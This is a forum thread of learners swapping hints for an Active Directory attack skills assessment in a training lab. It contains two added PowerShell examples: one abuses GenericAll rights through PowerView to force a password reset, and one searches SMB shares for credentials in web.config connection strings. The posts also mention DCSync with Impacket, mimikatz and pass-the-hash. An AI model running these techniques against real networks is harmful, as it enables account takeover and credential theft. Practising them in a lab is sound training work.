AD Enumeration & Attacks - Skills Assessment Part II 2

Can someone help me with the last flag? I'm a domain admin but I cannot perform the Kerberoasting; maybe I'm on the wrong route, idk.

I think you need to dump some secrets for that someone you're interested in; why don't you try Impacket with its -just-dc-user?

Anyone got the last 2 flags??

How did you get the last 2 flags, please?

I’m at the last two questions and am hard-stuck. I can see the privilege attached to the C**** user but can’t get PowerView working to pull off the attack.


For anyone else who has this issue, download this version of PowerView and you should be right.

In Q8 you may have run mimikatz and tried to crack the hash, but what else can we do with the hash? Look at the PtH module. If you get an NTLM hash of admin, you may want to try it on the MS01 IP.


There is a way to RDP into DC.

Hello everyone. I'm stuck on the last 2 questions of AD Skill_2: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

I have the credentials of the user with GenericAll and I try ACL abuse, but the PowerView module doesn't work… I tried the module on MS01, SQL01 and my Kali using proxychains, but every time the same error.

Can anyone help me?

Hi, how did you transfer PowerView? Perhaps the tool was damaged during the transfer.
Anyway, you are heading in the right direction.

For anyone stuck on the last two questions: after finding the user C… you can enumerate ACLs on MS01. Look at the ACL enumeration/abuse module to see some examples. Look also in BloodHound to check what you need to abuse to log in on DC01. Once you have done that, you can log in to DC01 and get the last flag. The NTLM hash for the KRBTGT account is a piece of cake :wink:
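The ACL enumeration and abuse path the reply above points at, written out as an added PowerView example (this is not code from the thread or from the module). It assumes the compromised account is called `ctrluser`, that its password is known, that the object it has `GenericAll` over is a user called `targetuser`, and that the chosen abuse is a forced password reset; all of those names and values are placeholders for the redacted ones in the thread. If BloodHound shows the edge lands on a group rather than a user, the last step is `Add-DomainGroupMember` instead of a reset.

```powershell
# Added example, not code from the thread: enumerate the ACL rights a compromised
# account holds with PowerView, then abuse a GenericAll right by resetting the
# target's password. All account names and passwords are placeholders.
Import-Module .\PowerView.ps1

# Credentials of the account that BloodHound/ACL enumeration flagged (assumed values)
$pw   = ConvertTo-SecureString 'CtrlUserPassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\ctrluser', $pw)

# 1. Which interesting rights does that account hold anywhere in the domain?
#    IdentityReferenceName is the holder, ObjectDN the object the ACE applies to.
Find-InterestingDomainAcl -ResolveGUIDs -Credential $cred |
    Where-Object { $_.IdentityReferenceName -eq 'ctrluser' } |
    Select-Object ObjectDN, ActiveDirectoryRights, ObjectAceType

# 2. Confirm the right on the intended target object only, so the reset is not a guess
$sid = ConvertTo-SID 'INLANEFREIGHT\ctrluser'
Get-DomainObjectAcl -Identity 'targetuser' -ResolveGUIDs -Credential $cred |
    Where-Object { $_.SecurityIdentifier -eq $sid -and $_.ActiveDirectoryRights -match 'GenericAll' } |
    Select-Object ObjectDN, ActiveDirectoryRights

# 3. GenericAll includes "Reset Password", which does not require the old password.
#    This locks the legitimate user out until it is changed back: note it for the report.
$newPw = ConvertTo-SecureString 'NewP@ssw0rd2024!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'targetuser' -AccountPassword $newPw -Credential $cred -Verbose

# 4. Verify the reset worked by binding to the domain as the target
$targetCred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\targetuser', $newPw)
Get-DomainUser -Identity 'targetuser' -Credential $targetCred |
    Select-Object samaccountname, memberof
```

Run this from a host that can reach a domain controller over LDAP (MS01 in the thread). If the import in step 1 throws, check the file hash against the copy you downloaded before chasing the ACL path, since a PowerView script damaged in transfer is the failure several posters describe.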

Hello all!
I've been stuck on "Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host." for a few days now and was wondering if anyone had a clue that could nudge me in the right direction. I have a feeling it's got to do with forcing a user to change their password, but all the enumeration I've been doing regarding that has been unsuccessful.


A few minutes ago I was in the same position as you. I tried everything, but nothing worked.

  • Check the credentials you get from SQL01 carefully (one went unnoticed by me)
  • List the new target (MS01); when you have it, check in which services you can use those credentials… whether by RDP, SMB or… W**M
  • Something you already tested on SQL01… /priv
  • Think simple, you have what you need for the change!

Best of luck!

Been working on Q8 of the AD Enumeration & Attacks - Skills Assessment Part II for the last few days. I got SYSTEM on SQL01 and got the local admin hash, so I can WinRM into SQL01 now. Used LaZagne, mimikatz, secretsdump, and a manual search for things. I also have the creds of ms******. I have 2 users (AB*** and BR***) that can RDP into MS01 but am having a difficult time trying to get to admin on that box. Any hints would be appreciated, or a DM. I've been doing these skills assessments for what feels like weeks now. Been reading and trying the things above and not having success.

Can anyone help me with the last 2 questions pls?

Q7: How were you guys able to log in to the SQL01 host with the D@********** password?
Help appreciated…

True username is in web.config (smb)
Password is in web.config (smb)
Don’t use -windows-auth


How exactly do I need to do this? I tried it, but the tools could not be run.

I’m really spent here!!

Can't get either the password or the password hash for INLANEFREIGHT.LOCAL\administrator.

I've run mimikatz, LaZagne and the mimikatz module in msfconsole.

Been able to grab the password hash and the cleartext for mssqlsvc, but nothing of administrator, just the SQL01$ local account.

Can anyone give me a hint? "Enumeration is an iterative process" seems such a vague hint, and nothing I do gives me something solid.

Found a Medium page from someone that gave a walkthrough of the assessment, but in his assessment he ran mimikatz with different results.


After gaining WinRM session with another user, got a meterpreter shell running, elevated it, ran kiwi and extracted the necessary hash!


Stuck at Q6 any hints?

As you need to find a file with a connection string, I would suggest looking at the SMB shares and searching manually or by using a tool. The second option will be faster. There are tools to search SMB shares (e.g. crackmapexec has various modules).
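The file-hunting step in the reply above, and the "username and password are in web.config" hint earlier in the thread, as an added PowerShell example (not code from the thread). It walks readable shares for `web.config`, parses the `<connectionStrings>` section, and normalises the key spellings a SQL Server connection string can use. The share path `\\SQL01\WebShare` and the inline sample config are constructed placeholders; the real share name and credentials are the ones the assessment redacts.

```powershell
# Added example, not code from the thread: locate web.config files on SMB shares and
# extract the SQL credentials from their connectionStrings entries.

function Get-FirstKey {
    # Return the value of the first key (case-insensitive) present in a hashtable.
    param([hashtable]$Table, [string[]]$Keys)
    foreach ($k in $Keys) { if ($Table.ContainsKey($k)) { return $Table[$k] } }
    return $null
}

function Get-ConnectionStringCreds {
    # Parse every <add connectionString="..."> under <connectionStrings>.
    param([Parameter(Mandatory)][xml]$Config, [string]$Source = '<inline>')
    foreach ($cs in $Config.configuration.connectionStrings.add) {
        $kv = @{}
        # "key=value;key=value" pairs; keys vary: Server/Data Source, User ID/uid, Password/pwd
        foreach ($pair in ($cs.connectionString -split ';')) {
            if ($pair -match '^\s*([^=]+?)\s*=\s*(.*?)\s*$') { $kv[$Matches[1].ToLower()] = $Matches[2] }
        }
        [pscustomobject]@{
            Source   = $Source
            Name     = $cs.name
            Server   = Get-FirstKey $kv @('server', 'data source')
            Database = Get-FirstKey $kv @('database', 'initial catalog')
            User     = Get-FirstKey $kv @('user id', 'uid', 'user')
            Password = Get-FirstKey $kv @('password', 'pwd')
        }
    }
}

# Constructed sample config, standing in for a file found on a share
$sample = [xml]@'
<configuration>
  <connectionStrings>
    <add name="DefaultConnection"
         connectionString="Server=SQL01;Database=app;User ID=svc_app;Password=S@mpleP4ss!"
         providerName="System.Data.SqlClient" />
  </connectionStrings>
</configuration>
'@
Get-ConnectionStringCreds -Config $sample -Source 'constructed-sample' | Format-List

# Against real shares: recurse each share you can read and parse every web.config found.
# The share list is an assumption; fill it from your SMB enumeration.
$shares = @('\\SQL01\WebShare')
foreach ($share in $shares) {
    Get-ChildItem -Path $share -Recurse -Filter 'web.config' -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-ConnectionStringCreds -Config ([xml](Get-Content -Path $_.FullName -Raw)) -Source $_.FullName
        }
}
```

A `User ID`/`Password` pair in a connection string is a SQL Server login, not a Windows account, which is why the later hint says not to pass `-windows-auth` to Impacket's `mssqlclient.py`: the default SQL authentication is the right mode for these credentials.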

Hi, I'm on the 8th question of the second skills assessment in Active Directory Enumeration & Attacks.
The question is:
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
Apparently I have to pass the hash, and I feel confident that I have tried more than 7 or 8 pass-the-hash techniques, but none of them worked. I already have the hash of the Administrator account, but it just does not work. Any help would be appreciated.